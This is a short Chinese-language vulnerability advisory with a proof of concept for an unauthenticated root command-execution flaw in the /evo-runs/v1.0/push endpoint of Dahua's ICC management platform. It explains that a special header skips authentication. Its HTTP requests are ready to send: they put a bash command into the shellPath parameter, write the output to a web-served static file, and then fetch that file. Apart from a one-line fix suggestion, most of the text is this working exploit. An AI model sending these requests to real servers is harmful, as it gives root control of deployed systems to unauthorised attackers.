大华ICC智能物联综合管理平台的/evo-runs/v1.0/push接口存在高危命令执行漏洞,攻击者可通过构造特殊请求绕过鉴权机制,直接以root权限在目标服务器上执行任意系统命令

POC

  1. 当请求头中包含X-Subject-Headerflag: ADAPT时,系统会跳过正常鉴权流程

  2. 接口处理用户输入时未做充分过滤,直接将shellPath参数内容传递给Runtime.getRuntime().exec()执行

  3. 命令执行权限为root,但存在部分限制(如命令中不能包含空格)

POST /evo-runs/v1.0/push HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0
Content-Type: application/json
X-Subject-Headerflag: ADAPT
Content-Length: 245

{
  "method": "agent.ossm.mapping.config",
  "info": {
    "configure": "abcd",
    "filePath": "haha",
    "paramMap": {
      "shellPath": "/bin/bash -c ip addr>/opt/evoWpms/static/xxx.txt",
      "filePath": "abc"
    },
    "requestIp": ""
  }
}

GET /static/xxx.txt HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.1

修复建议

请联系厂商安装补丁或使用防护设备进行拦截